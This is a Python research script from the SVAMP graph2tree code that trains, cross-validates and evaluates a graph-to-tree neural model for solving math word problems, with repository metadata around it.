[
"MIT"
] | 39
|
2021-04-08T01:24:36.000Z
|
2022-03-12T06:51:33.000Z
|
code/graph2tree/src/main.py
|
intflow/SVAMP
|
10731d8ea489f4eb8e12e35c6c2781f8d837866a
|
[
"MIT"
] | 8
|
2021-04-12T08:02:05.000Z
|
2022-03-07T06:36:39.000Z
|
code/graph2tree/src/main.py
|
intflow/SVAMP
|
10731d8ea489f4eb8e12e35c6c2781f8d837866a
|
[
"MIT"
] | 11
|
2021-04-08T01:24:41.000Z
|
2021-12-15T22:51:51.000Z
|
# coding: utf-8
import time
import torch.optim
from collections import OrderedDict
from attrdict import AttrDict
import pandas as pd
try:
import cPickle as pickle
except ImportError:
import pickle
import json
import pdb
from src.args import build_parser
from src.train_and_evaluate import *
from src.components.models import *
from src.components.contextual_embeddings import *
from src.utils.helper import *
from src.utils.logger import *
from src.utils.expressions_transfer import *
global log_folder
global model_folder
global result_folder
global data_path
global board_path
log_folder = 'logs'
model_folder = 'models'
outputs_folder = 'outputs'
result_folder = './out/'
data_path = './data/'
board_path = './runs/'
def read_json(path):
with open(path,'r') as f:
file = json.load(f)
return file
USE_CUDA = True
def get_new_fold(data,pairs,group):
new_fold = []
for item,pair,g in zip(data, pairs, group):
pair = list(pair)
pair.append(g['group_num'])
pair = tuple(pair)
new_fold.append(pair)
return new_fold
def change_num(num):
new_num = []
for item in num:
if '/' in item:
new_str = item.split(')')[0]
new_str = new_str.split('(')[1]
a = float(new_str.split('/')[0])
b = float(new_str.split('/')[1])
value = a/b
new_num.append(value)
elif '%' in item:
value = float(item[0:-1])/100
new_num.append(value)
else:
new_num.append(float(item))
return new_num
def main():
parser = build_parser()
args = parser.parse_args()
config = args
if config.mode == 'train':
is_train = True
else:
is_train = False
''' Set seed for reproducibility'''
np.random.seed(config.seed)
torch.manual_seed(config.seed)
random.seed(config.seed)
'''GPU initialization'''
device = gpu_init_pytorch(config.gpu)
if config.full_cv:
global data_path
data_name = config.dataset
data_path = data_path + data_name + '/'
config.val_result_path = os.path.join(result_folder, 'CV_results_{}.json'.format(data_name))
fold_acc_score = 0.0
folds_scores = []
best_acc = []
for z in range(5):
run_name = config.run_name + '_fold' + str(z)
config.dataset = 'fold' + str(z)
config.log_path = os.path.join(log_folder, run_name)
config.model_path = os.path.join(model_folder, run_name)
config.board_path = os.path.join(board_path, run_name)
config.outputs_path = os.path.join(outputs_folder, run_name)
vocab1_path = os.path.join(config.model_path, 'vocab1.p')
vocab2_path = os.path.join(config.model_path, 'vocab2.p')
config_file = os.path.join(config.model_path, 'config.p')
log_file = os.path.join(config.log_path, 'log.txt')
if config.results:
config.result_path = os.path.join(result_folder, 'val_results_{}.json'.format(config.dataset))
create_save_directories(config.log_path)
create_save_directories(config.model_path)
create_save_directories(config.outputs_path)
logger = get_logger(run_name, log_file, logging.DEBUG)
logger.info('Experiment Name: {}'.format(config.run_name))
logger.debug('Created Relevant Directories')
logger.info('Loading Data...')
train_ls, dev_ls = load_raw_data(data_path, config.dataset, is_train)
pairs_trained, pairs_tested, generate_nums, copy_nums = transfer_num(train_ls, dev_ls, config.challenge_disp)
logger.debug('Data Loaded...')
logger.debug('Number of Training Examples: {}'.format(len(pairs_trained)))
logger.debug('Number of Testing Examples: {}'.format(len(pairs_tested)))
logger.debug('Extra Numbers: {}'.format(generate_nums))
logger.debug('Maximum Number of Numbers: {}'.format(copy_nums))
logger.info('Creating Vocab...')
input_lang = None
output_lang = None
input_lang, output_lang, train_pairs, test_pairs = prepare_data(config, logger, pairs_trained, pairs_tested, config.trim_threshold, generate_nums, copy_nums, input_lang, output_lang, tree=True)
checkpoint = get_latest_checkpoint(config.model_path, logger)
with open(vocab1_path, 'wb') as f:
pickle.dump(input_lang, f, protocol=pickle.HIGHEST_PROTOCOL)
with open(vocab2_path, 'wb') as f:
pickle.dump(output_lang, f, protocol=pickle.HIGHEST_PROTOCOL)
logger.debug('Vocab saved at {}'.format(vocab1_path))
generate_num_ids = []
for num in generate_nums:
generate_num_ids.append(output_lang.word2index[num])
config.len_generate_nums = len(generate_nums)
config.copy_nums = copy_nums
with open(config_file, 'wb') as f:
pickle.dump(vars(config), f, protocol=pickle.HIGHEST_PROTOCOL)
logger.debug('Config File Saved')
logger.info('Initializing Models...')
# Initialize models
embedding = None
if config.embedding == 'bert':
embedding = BertEncoder(config.emb_name, device, config.freeze_emb)
elif config.embedding == 'roberta':
embedding = RobertaEncoder(config.emb_name, device, config.freeze_emb)
else:
embedding = Embedding(config, input_lang, input_size=input_lang.n_words, embedding_size=config.embedding_size, dropout=config.dropout)
encoder = EncoderSeq(cell_type=config.cell_type, embedding_size=config.embedding_size, hidden_size=config.hidden_size, n_layers=config.depth, dropout=config.dropout)
predict = Prediction(hidden_size=config.hidden_size, op_nums=output_lang.n_words - copy_nums - 1 - len(generate_nums), input_size=len(generate_nums), dropout=config.dropout)
generate = GenerateNode(hidden_size=config.hidden_size, op_nums=output_lang.n_words - copy_nums - 1 - len(generate_nums), embedding_size=config.embedding_size, dropout=config.dropout)
merge = Merge(hidden_size=config.hidden_size, embedding_size=config.embedding_size, dropout=config.dropout)
# the embedding layer is only for generated number embeddings, operators, and paddings
logger.debug('Models Initialized')
logger.info('Initializing Optimizers...')
embedding_optimizer = torch.optim.Adam(embedding.parameters(), lr=config.emb_lr, weight_decay=config.weight_decay)
encoder_optimizer = torch.optim.Adam(encoder.parameters(), lr=config.lr, weight_decay=config.weight_decay)
predict_optimizer = torch.optim.Adam(predict.parameters(), lr=config.lr, weight_decay=config.weight_decay)
generate_optimizer = torch.optim.Adam(generate.parameters(), lr=config.lr, weight_decay=config.weight_decay)
merge_optimizer = torch.optim.Adam(merge.parameters(), lr=config.lr, weight_decay=config.weight_decay)
logger.debug('Optimizers Initialized')
logger.info('Initializing Schedulers...')
embedding_scheduler = torch.optim.lr_scheduler.StepLR(embedding_optimizer, step_size=20, gamma=0.5)
encoder_scheduler = torch.optim.lr_scheduler.StepLR(encoder_optimizer, step_size=20, gamma=0.5)
predict_scheduler = torch.optim.lr_scheduler.StepLR(predict_optimizer, step_size=20, gamma=0.5)
generate_scheduler = torch.optim.lr_scheduler.StepLR(generate_optimizer, step_size=20, gamma=0.5)
merge_scheduler = torch.optim.lr_scheduler.StepLR(merge_optimizer, step_size=20, gamma=0.5)
logger.debug('Schedulers Initialized')
logger.info('Loading Models on GPU {}...'.format(config.gpu))
# Move models to GPU
if USE_CUDA:
embedding.to(device)
encoder.to(device)
predict.to(device)
generate.to(device)
merge.to(device)
logger.debug('Models loaded on GPU {}'.format(config.gpu))
max_value_corr = 0
len_total_eval = 0
max_val_acc = 0.0
max_train_acc = 0.0
eq_acc = 0.0
best_epoch = -1
min_train_loss = float('inf')
logger.info('Starting Training Procedure')
for epoch in range(config.epochs):
loss_total = 0
input_batches, input_lengths, output_batches, output_lengths, nums_batches, num_stack_batches, num_pos_batches, num_size_batches, num_value_batches, graph_batches, group_batches = prepare_train_batch(train_pairs, config.batch_size)
od = OrderedDict()
od['Epoch'] = epoch + 1
print_log(logger, od)
start = time.time()
for idx in range(len(input_lengths)):
loss = train_tree(
config, input_batches[idx], input_lengths[idx], output_batches[idx], output_lengths[idx],
num_stack_batches[idx], num_size_batches[idx], num_value_batches[idx], group_batches[idx], generate_num_ids, embedding, encoder, predict, generate, merge,
embedding_optimizer, encoder_optimizer, predict_optimizer, generate_optimizer, merge_optimizer, input_lang, output_lang,
num_pos_batches[idx], graph_batches[idx])
loss_total += loss
print("Completed {} / {}...".format(idx, len(input_lengths)), end = '\r', flush = True)
embedding_scheduler.step()
encoder_scheduler.step()
predict_scheduler.step()
generate_scheduler.step()
merge_scheduler.step()
logger.debug('Training for epoch {} completed...\nTime Taken: {}'.format(epoch, time_since(time.time() - start)))
if loss_total / len(input_lengths) < min_train_loss:
min_train_loss = loss_total / len(input_lengths)
train_value_ac = 0
train_equation_ac = 0
train_eval_total = 1
if config.show_train_acc:
train_eval_total = 0
logger.info('Computing Train Accuracy')
start = time.time()
with torch.no_grad():
for train_batch in train_pairs:
batch_graph = get_single_example_graph(train_batch[0], train_batch[1], train_batch[7], train_batch[4], train_batch[5])
train_res = evaluate_tree(config, train_batch[0], train_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, train_batch[4], train_batch[5], batch_graph, test_batch[7], beam_size=config.beam_size)
train_val_ac, train_equ_ac, _, _ = compute_prefix_tree_result(train_res, train_batch[2], output_lang, train_batch[4], train_batch[6])
if train_val_ac:
train_value_ac += 1
if train_equ_ac:
train_equation_ac += 1
train_eval_total += 1
logger.debug('Train Accuracy Computed...\nTime Taken: {}'.format(time_since(time.time() - start)))
logger.info('Starting Validation')
value_ac = 0
equation_ac = 0
eval_total = 0
start = time.time()
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('---------------------------------------\n')
f_out.write('Epoch: ' + str(epoch) + '\n')
f_out.write('---------------------------------------\n')
f_out.close()
ex_num = 0
for test_batch in test_pairs:
batch_graph = get_single_example_graph(test_batch[0], test_batch[1], test_batch[7], test_batch[4], test_batch[5])
test_res = evaluate_tree(config, test_batch[0], test_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, test_batch[4], test_batch[5], batch_graph, test_batch[7], beam_size=config.beam_size)
val_ac, equ_ac, _, _ = compute_prefix_tree_result(test_res, test_batch[2], output_lang, test_batch[4], test_batch[6])
cur_result = 0
if val_ac:
value_ac += 1
cur_result = 1
if equ_ac:
equation_ac += 1
eval_total += 1
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('Example: ' + str(ex_num) + '\n')
f_out.write('Source: ' + stack_to_string(sentence_from_indexes(input_lang, test_batch[0])) + '\n')
f_out.write('Target: ' + stack_to_string(sentence_from_indexes(output_lang, test_batch[2])) + '\n')
f_out.write('Generated: ' + stack_to_string(sentence_from_indexes(output_lang, test_res)) + '\n')
if config.nums_disp:
src_nums = len(test_batch[4])
tgt_nums = 0
pred_nums = 0
for k_tgt in sentence_from_indexes(output_lang, test_batch[2]):
if k_tgt not in ['+', '-', '*', '/']:
tgt_nums += 1
for k_pred in sentence_from_indexes(output_lang, test_res):
if k_pred not in ['+', '-', '*', '/']:
pred_nums += 1
f_out.write('Numbers in question: ' + str(src_nums) + '\n')
f_out.write('Numbers in Target Equation: ' + str(tgt_nums) + '\n')
f_out.write('Numbers in Predicted Equation: ' + str(pred_nums) + '\n')
f_out.write('Result: ' + str(cur_result) + '\n' + '\n')
f_out.close()
ex_num+=1
if float(train_value_ac) / train_eval_total > max_train_acc:
max_train_acc = float(train_value_ac) / train_eval_total
if float(value_ac) / eval_total > max_val_acc:
max_value_corr = value_ac
len_total_eval = eval_total
max_val_acc = float(value_ac) / eval_total
eq_acc = float(equation_ac) / eval_total
best_epoch = epoch+1
state = {
'epoch' : epoch,
'best_epoch': best_epoch-1,
'embedding_state_dict': embedding.state_dict(),
'encoder_state_dict': encoder.state_dict(),
'predict_state_dict': predict.state_dict(),
'generate_state_dict': generate.state_dict(),
'merge_state_dict': merge.state_dict(),
'embedding_optimizer_state_dict': embedding_optimizer.state_dict(),
'encoder_optimizer_state_dict': encoder_optimizer.state_dict(),
'predict_optimizer_state_dict': predict_optimizer.state_dict(),
'generate_optimizer_state_dict': generate_optimizer.state_dict(),
'merge_optimizer_state_dict': merge_optimizer.state_dict(),
'embedding_scheduler_state_dict': embedding_scheduler.state_dict(),
'encoder_scheduler_state_dict': encoder_scheduler.state_dict(),
'predict_scheduler_state_dict': predict_scheduler.state_dict(),
'generate_scheduler_state_dict': generate_scheduler.state_dict(),
'merge_scheduler_state_dict': merge_scheduler.state_dict(),
'voc1': input_lang,
'voc2': output_lang,
'train_loss_epoch' : loss_total / len(input_lengths),
'min_train_loss' : min_train_loss,
'val_acc_epoch' : float(value_ac) / eval_total,
'max_val_acc' : max_val_acc,
'equation_acc' : eq_acc,
'max_train_acc' : max_train_acc,
'generate_nums' : generate_nums
}
if config.save_model:
save_checkpoint(state, epoch, logger, config.model_path, config.ckpt)
od = OrderedDict()
od['Epoch'] = epoch + 1
od['best_epoch'] = best_epoch
od['train_loss_epoch'] = loss_total / len(input_lengths)
od['min_train_loss'] = min_train_loss
od['train_acc_epoch'] = float(train_value_ac) / train_eval_total
od['max_train_acc'] = max_train_acc
od['val_acc_epoch'] = float(value_ac) / eval_total
od['equation_acc_epoch'] = float(equation_ac) / eval_total
od['max_val_acc'] = max_val_acc
od['equation_acc'] = eq_acc
print_log(logger, od)
logger.debug('Validation Completed...\nTime Taken: {}'.format(time_since(time.time() - start)))
if config.results:
store_results(config, max_train_acc, max_val_acc, eq_acc, min_train_loss, best_epoch)
logger.info('Scores saved at {}'.format(config.result_path))
best_acc.append((max_value_corr, len_total_eval))
total_value_corr = 0
total_len = 0
for w in range(len(best_acc)):
folds_scores.append(float(best_acc[w][0])/best_acc[w][1])
total_value_corr += best_acc[w][0]
total_len += best_acc[w][1]
fold_acc_score = float(total_value_corr)/total_len
store_val_results(config, fold_acc_score, folds_scores)
logger.info('Final Val score: {}'.format(fold_acc_score))
else:
run_name = config.run_name
config.log_path = os.path.join(log_folder, run_name)
config.model_path = os.path.join(model_folder, run_name)
config.board_path = os.path.join(board_path, run_name)
config.outputs_path = os.path.join(outputs_folder, run_name)
vocab1_path = os.path.join(config.model_path, 'vocab1.p')
vocab2_path = os.path.join(config.model_path, 'vocab2.p')
config_file = os.path.join(config.model_path, 'config.p')
log_file = os.path.join(config.log_path, 'log.txt')
if config.results:
config.result_path = os.path.join(result_folder, 'val_results_{}.json'.format(config.dataset))
if is_train:
create_save_directories(config.log_path)
create_save_directories(config.model_path)
create_save_directories(config.outputs_path)
else:
create_save_directories(config.log_path)
create_save_directories(config.result_path)
logger = get_logger(run_name, log_file, logging.DEBUG)
logger.info('Experiment Name: {}'.format(config.run_name))
logger.debug('Created Relevant Directories')
logger.info('Loading Data...')
train_ls, dev_ls = load_raw_data(data_path, config.dataset, is_train)
pairs_trained, pairs_tested, generate_nums, copy_nums = transfer_num(train_ls, dev_ls, config.challenge_disp)
logger.debug('Data Loaded...')
if is_train:
logger.debug('Number of Training Examples: {}'.format(len(pairs_trained)))
logger.debug('Number of Testing Examples: {}'.format(len(pairs_tested)))
logger.debug('Extra Numbers: {}'.format(generate_nums))
logger.debug('Maximum Number of Numbers: {}'.format(copy_nums))
if is_train:
logger.info('Creating Vocab...')
input_lang = None
output_lang = None
else:
logger.info('Loading Vocab File...')
with open(vocab1_path, 'rb') as f:
input_lang = pickle.load(f)
with open(vocab2_path, 'rb') as f:
output_lang = pickle.load(f)
logger.info('Vocab Files loaded from {}\nNumber of Words: {}'.format(vocab1_path, input_lang.n_words))
input_lang, output_lang, train_pairs, test_pairs = prepare_data(config, logger, pairs_trained, pairs_tested, config.trim_threshold, generate_nums, copy_nums, input_lang, output_lang, tree=True)
checkpoint = get_latest_checkpoint(config.model_path, logger)
if is_train:
with open(vocab1_path, 'wb') as f:
pickle.dump(input_lang, f, protocol=pickle.HIGHEST_PROTOCOL)
with open(vocab2_path, 'wb') as f:
pickle.dump(output_lang, f, protocol=pickle.HIGHEST_PROTOCOL)
logger.debug('Vocab saved at {}'.format(vocab1_path))
generate_num_ids = []
for num in generate_nums:
generate_num_ids.append(output_lang.word2index[num])
config.len_generate_nums = len(generate_nums)
config.copy_nums = copy_nums
with open(config_file, 'wb') as f:
pickle.dump(vars(config), f, protocol=pickle.HIGHEST_PROTOCOL)
logger.debug('Config File Saved')
logger.info('Initializing Models...')
# Initialize models
embedding = None
if config.embedding == 'bert':
embedding = BertEncoder(config.emb_name, device, config.freeze_emb)
elif config.embedding == 'roberta':
embedding = RobertaEncoder(config.emb_name, device, config.freeze_emb)
else:
embedding = Embedding(config, input_lang, input_size=input_lang.n_words, embedding_size=config.embedding_size, dropout=config.dropout)
encoder = EncoderSeq(cell_type=config.cell_type, embedding_size=config.embedding_size, hidden_size=config.hidden_size, n_layers=config.depth, dropout=config.dropout)
predict = Prediction(hidden_size=config.hidden_size, op_nums=output_lang.n_words - copy_nums - 1 - len(generate_nums), input_size=len(generate_nums), dropout=config.dropout)
generate = GenerateNode(hidden_size=config.hidden_size, op_nums=output_lang.n_words - copy_nums - 1 - len(generate_nums), embedding_size=config.embedding_size, dropout=config.dropout)
merge = Merge(hidden_size=config.hidden_size, embedding_size=config.embedding_size, dropout=config.dropout)
# the embedding layer is only for generated number embeddings, operators, and paddings
logger.debug('Models Initialized')
logger.info('Initializing Optimizers...')
embedding_optimizer = torch.optim.Adam(embedding.parameters(), lr=config.emb_lr, weight_decay=config.weight_decay)
encoder_optimizer = torch.optim.Adam(encoder.parameters(), lr=config.lr, weight_decay=config.weight_decay)
predict_optimizer = torch.optim.Adam(predict.parameters(), lr=config.lr, weight_decay=config.weight_decay)
generate_optimizer = torch.optim.Adam(generate.parameters(), lr=config.lr, weight_decay=config.weight_decay)
merge_optimizer = torch.optim.Adam(merge.parameters(), lr=config.lr, weight_decay=config.weight_decay)
logger.debug('Optimizers Initialized')
logger.info('Initializing Schedulers...')
embedding_scheduler = torch.optim.lr_scheduler.StepLR(embedding_optimizer, step_size=20, gamma=0.5)
encoder_scheduler = torch.optim.lr_scheduler.StepLR(encoder_optimizer, step_size=20, gamma=0.5)
predict_scheduler = torch.optim.lr_scheduler.StepLR(predict_optimizer, step_size=20, gamma=0.5)
generate_scheduler = torch.optim.lr_scheduler.StepLR(generate_optimizer, step_size=20, gamma=0.5)
merge_scheduler = torch.optim.lr_scheduler.StepLR(merge_optimizer, step_size=20, gamma=0.5)
logger.debug('Schedulers Initialized')
logger.info('Loading Models on GPU {}...'.format(config.gpu))
# Move models to GPU
if USE_CUDA:
embedding.to(device)
encoder.to(device)
predict.to(device)
generate.to(device)
merge.to(device)
logger.debug('Models loaded on GPU {}'.format(config.gpu))
max_val_acc = 0.0
max_train_acc = 0.0
eq_acc = 0.0
best_epoch = -1
min_train_loss = float('inf')
logger.info('Starting Training Procedure')
for epoch in range(config.epochs):
loss_total = 0
input_batches, input_lengths, output_batches, output_lengths, nums_batches, num_stack_batches, num_pos_batches, num_size_batches, num_value_batches, graph_batches, group_batches = prepare_train_batch(train_pairs, config.batch_size)
od = OrderedDict()
od['Epoch'] = epoch + 1
print_log(logger, od)
start = time.time()
for idx in range(len(input_lengths)):
loss = train_tree(
config, input_batches[idx], input_lengths[idx], output_batches[idx], output_lengths[idx],
num_stack_batches[idx], num_size_batches[idx], num_value_batches[idx], group_batches[idx], generate_num_ids, embedding, encoder, predict, generate, merge,
embedding_optimizer, encoder_optimizer, predict_optimizer, generate_optimizer, merge_optimizer, input_lang, output_lang,
num_pos_batches[idx], graph_batches[idx])
loss_total += loss
print("Completed {} / {}...".format(idx, len(input_lengths)), end = '\r', flush = True)
embedding_scheduler.step()
encoder_scheduler.step()
predict_scheduler.step()
generate_scheduler.step()
merge_scheduler.step()
logger.debug('Training for epoch {} completed...\nTime Taken: {}'.format(epoch, time_since(time.time() - start)))
if loss_total / len(input_lengths) < min_train_loss:
min_train_loss = loss_total / len(input_lengths)
train_value_ac = 0
train_equation_ac = 0
train_eval_total = 1
if config.show_train_acc:
train_eval_total = 0
logger.info('Computing Train Accuracy')
start = time.time()
with torch.no_grad():
for train_batch in train_pairs:
batch_graph = get_single_example_graph(train_batch[0], train_batch[1], train_batch[7], train_batch[4], train_batch[5])
train_res = evaluate_tree(config, train_batch[0], train_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, train_batch[4], train_batch[5], batch_graph, test_batch[7], beam_size=config.beam_size)
train_val_ac, train_equ_ac, _, _ = compute_prefix_tree_result(train_res, train_batch[2], output_lang, train_batch[4], train_batch[6])
if train_val_ac:
train_value_ac += 1
if train_equ_ac:
train_equation_ac += 1
train_eval_total += 1
logger.debug('Train Accuracy Computed...\nTime Taken: {}'.format(time_since(time.time() - start)))
logger.info('Starting Validation')
value_ac = 0
equation_ac = 0
eval_total = 0
start = time.time()
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('---------------------------------------\n')
f_out.write('Epoch: ' + str(epoch) + '\n')
f_out.write('---------------------------------------\n')
f_out.close()
ex_num = 0
for test_batch in test_pairs:
batch_graph = get_single_example_graph(test_batch[0], test_batch[1], test_batch[7], test_batch[4], test_batch[5])
test_res = evaluate_tree(config, test_batch[0], test_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, test_batch[4], test_batch[5], batch_graph, test_batch[7], beam_size=config.beam_size)
val_ac, equ_ac, _, _ = compute_prefix_tree_result(test_res, test_batch[2], output_lang, test_batch[4], test_batch[6])
cur_result = 0
if val_ac:
value_ac += 1
cur_result = 1
if equ_ac:
equation_ac += 1
eval_total += 1
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('Example: ' + str(ex_num) + '\n')
f_out.write('Source: ' + stack_to_string(sentence_from_indexes(input_lang, test_batch[0])) + '\n')
f_out.write('Target: ' + stack_to_string(sentence_from_indexes(output_lang, test_batch[2])) + '\n')
f_out.write('Generated: ' + stack_to_string(sentence_from_indexes(output_lang, test_res)) + '\n')
if config.challenge_disp:
f_out.write('Type: ' + test_batch[8] + '\n')
f_out.write('Variation Type: ' + test_batch[9] + '\n')
f_out.write('Annotator: ' + test_batch[10] + '\n')
f_out.write('Alternate: ' + str(test_batch[11]) + '\n')
if config.nums_disp:
src_nums = len(test_batch[4])
tgt_nums = 0
pred_nums = 0
for k_tgt in sentence_from_indexes(output_lang, test_batch[2]):
if k_tgt not in ['+', '-', '*', '/']:
tgt_nums += 1
for k_pred in sentence_from_indexes(output_lang, test_res):
if k_pred not in ['+', '-', '*', '/']:
pred_nums += 1
f_out.write('Numbers in question: ' + str(src_nums) + '\n')
f_out.write('Numbers in Target Equation: ' + str(tgt_nums) + '\n')
f_out.write('Numbers in Predicted Equation: ' + str(pred_nums) + '\n')
f_out.write('Result: ' + str(cur_result) + '\n' + '\n')
f_out.close()
ex_num+=1
if float(train_value_ac) / train_eval_total > max_train_acc:
max_train_acc = float(train_value_ac) / train_eval_total
if float(value_ac) / eval_total > max_val_acc:
max_val_acc = float(value_ac) / eval_total
eq_acc = float(equation_ac) / eval_total
best_epoch = epoch+1
state = {
'epoch' : epoch,
'best_epoch': best_epoch-1,
'embedding_state_dict': embedding.state_dict(),
'encoder_state_dict': encoder.state_dict(),
'predict_state_dict': predict.state_dict(),
'generate_state_dict': generate.state_dict(),
'merge_state_dict': merge.state_dict(),
'embedding_optimizer_state_dict': embedding_optimizer.state_dict(),
'encoder_optimizer_state_dict': encoder_optimizer.state_dict(),
'predict_optimizer_state_dict': predict_optimizer.state_dict(),
'generate_optimizer_state_dict': generate_optimizer.state_dict(),
'merge_optimizer_state_dict': merge_optimizer.state_dict(),
'embedding_scheduler_state_dict': embedding_scheduler.state_dict(),
'encoder_scheduler_state_dict': encoder_scheduler.state_dict(),
'predict_scheduler_state_dict': predict_scheduler.state_dict(),
'generate_scheduler_state_dict': generate_scheduler.state_dict(),
'merge_scheduler_state_dict': merge_scheduler.state_dict(),
'voc1': input_lang,
'voc2': output_lang,
'train_loss_epoch' : loss_total / len(input_lengths),
'min_train_loss' : min_train_loss,
'val_acc_epoch' : float(value_ac) / eval_total,
'max_val_acc' : max_val_acc,
'equation_acc' : eq_acc,
'max_train_acc' : max_train_acc,
'generate_nums' : generate_nums
}
if config.save_model:
save_checkpoint(state, epoch, logger, config.model_path, config.ckpt)
od = OrderedDict()
od['Epoch'] = epoch + 1
od['best_epoch'] = best_epoch
od['train_loss_epoch'] = loss_total / len(input_lengths)
od['min_train_loss'] = min_train_loss
od['train_acc_epoch'] = float(train_value_ac) / train_eval_total
od['max_train_acc'] = max_train_acc
od['val_acc_epoch'] = float(value_ac) / eval_total
od['equation_acc_epoch'] = float(equation_ac) / eval_total
od['max_val_acc'] = max_val_acc
od['equation_acc'] = eq_acc
print_log(logger, od)
logger.debug('Validation Completed...\nTime Taken: {}'.format(time_since(time.time() - start)))
if config.results:
store_results(config, max_train_acc, max_val_acc, eq_acc, min_train_loss, best_epoch)
logger.info('Scores saved at {}'.format(config.result_path))
else:
gpu = config.gpu
mode = config.mode
dataset = config.dataset
batch_size = config.batch_size
old_run_name = config.run_name
with open(config_file, 'rb') as f:
config = AttrDict(pickle.load(f))
config.gpu = gpu
config.mode = mode
config.dataset = dataset
config.batch_size = batch_size
logger.info('Initializing Models...')
# Initialize models
embedding = None
if config.embedding == 'bert':
embedding = BertEncoder(config.emb_name, device, config.freeze_emb)
elif config.embedding == 'roberta':
embedding = RobertaEncoder(config.emb_name, device, config.freeze_emb)
else:
embedding = Embedding(config, input_lang, input_size=input_lang.n_words, embedding_size=config.embedding_size, dropout=config.dropout)
# encoder = EncoderSeq(input_size=input_lang.n_words, embedding_size=config.embedding_size, hidden_size=config.hidden_size, n_layers=config.depth, dropout=config.dropout)
encoder = EncoderSeq(cell_type=config.cell_type, embedding_size=config.embedding_size, hidden_size=config.hidden_size, n_layers=config.depth, dropout=config.dropout)
predict = Prediction(hidden_size=config.hidden_size, op_nums=output_lang.n_words - config.copy_nums - 1 - config.len_generate_nums, input_size=config.len_generate_nums, dropout=config.dropout)
generate = GenerateNode(hidden_size=config.hidden_size, op_nums=output_lang.n_words - config.copy_nums - 1 - config.len_generate_nums, embedding_size=config.embedding_size, dropout=config.dropout)
merge = Merge(hidden_size=config.hidden_size, embedding_size=config.embedding_size, dropout=config.dropout)
# the embedding layer is only for generated number embeddings, operators, and paddings
logger.debug('Models Initialized')
epoch_offset, min_train_loss, max_train_acc, max_val_acc, equation_acc, best_epoch, generate_nums = load_checkpoint(config, embedding, encoder, predict, generate, merge, config.mode, checkpoint, logger, device)
logger.info('Prediction from')
od = OrderedDict()
od['epoch'] = epoch_offset
od['min_train_loss'] = min_train_loss
od['max_train_acc'] = max_train_acc
od['max_val_acc'] = max_val_acc
od['equation_acc'] = equation_acc
od['best_epoch'] = best_epoch
print_log(logger, od)
generate_num_ids = []
for num in generate_nums:
generate_num_ids.append(output_lang.word2index[num])
value_ac = 0
equation_ac = 0
eval_total = 0
start = time.time()
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('---------------------------------------\n')
f_out.write('Test Name: ' + old_run_name + '\n')
f_out.write('---------------------------------------\n')
f_out.close()
test_res_ques, test_res_act, test_res_gen, test_res_scores = [], [], [], []
ex_num = 0
for test_batch in test_pairs:
batch_graph = get_single_example_graph(test_batch[0], test_batch[1], test_batch[7], test_batch[4], test_batch[5])
test_res = evaluate_tree(config, test_batch[0], test_batch[1], generate_num_ids, embedding, encoder, predict, generate,
merge, input_lang, output_lang, test_batch[4], test_batch[5], batch_graph, test_batch[7], beam_size=config.beam_size)
val_ac, equ_ac, _, _ = compute_prefix_tree_result(test_res, test_batch[2], output_lang, test_batch[4], test_batch[6])
cur_result = 0
if val_ac:
value_ac += 1
cur_result = 1
if equ_ac:
equation_ac += 1
eval_total += 1
with open(config.outputs_path + '/outputs.txt', 'a') as f_out:
f_out.write('Example: ' + str(ex_num) + '\n')
f_out.write('Source: ' + stack_to_string(sentence_from_indexes(input_lang, test_batch[0])) + '\n')
f_out.write('Target: ' + stack_to_string(sentence_from_indexes(output_lang, test_batch[2])) + '\n')
f_out.write('Generated: ' + stack_to_string(sentence_from_indexes(output_lang, test_res)) + '\n')
if config.nums_disp:
src_nums = len(test_batch[4])
tgt_nums = 0
pred_nums = 0
for k_tgt in sentence_from_indexes(output_lang, test_batch[2]):
if k_tgt not in ['+', '-', '*', '/']:
tgt_nums += 1
for k_pred in sentence_from_indexes(output_lang, test_res):
if k_pred not in ['+', '-', '*', '/']:
pred_nums += 1
f_out.write('Numbers in question: ' + str(src_nums) + '\n')
f_out.write('Numbers in Target Equation: ' + str(tgt_nums) + '\n')
f_out.write('Numbers in Predicted Equation: ' + str(pred_nums) + '\n')
f_out.write('Result: ' + str(cur_result) + '\n' + '\n')
f_out.close()
ex_num+=1
results_df = pd.DataFrame([test_res_ques, test_res_act, test_res_gen, test_res_scores]).transpose()
results_df.columns = ['Question', 'Actual Equation', 'Generated Equation', 'Score']
csv_file_path = os.path.join(config.outputs_path, config.dataset+'.csv')
results_df.to_csv(csv_file_path, index = False)
logger.info('Accuracy: {}'.format(sum(test_res_scores)/len(test_res_scores)))
if __name__ == '__main__':
main()
| 41.673292
| 235
| 0.707902
| 4,778
| 33,547
| 4.653411
| 0.067183
| 0.024287
| 0.014977
| 0.012144
| 0.879869
| 0.869839
| 0.868445
| 0.867005
| 0.863857
| 0.863857
| 0
| 0.009023
| 0.160879
| 33,547
| 805
| 236
| 41.673292
| 0.780817
| 0.015829
| 0
| 0.799073
| 0
| 0
| 0.119556
| 0.024585
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006182
| false
| 0
| 0.026275
| 0
| 0.037094
| 0.010819
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ee06a15aa02924927d221fd47c5a39ee208a88a
| 200
|
py
|
Python
|
shapreg/__init__.py
|
iancovert/shapley-regression
|
ea7d149d92408c8b219fc7b37ff2e71fc22050dc
|
[
"MIT"
] | 26
|
2020-11-23T12:27:59.000Z
|
2022-03-27T07:24:08.000Z
|
shapreg/__init__.py
|
iancovert/shapley-regression
|
ea7d149d92408c8b219fc7b37ff2e71fc22050dc
|
[
"MIT"
] | 1
|
2021-04-04T20:54:53.000Z
|
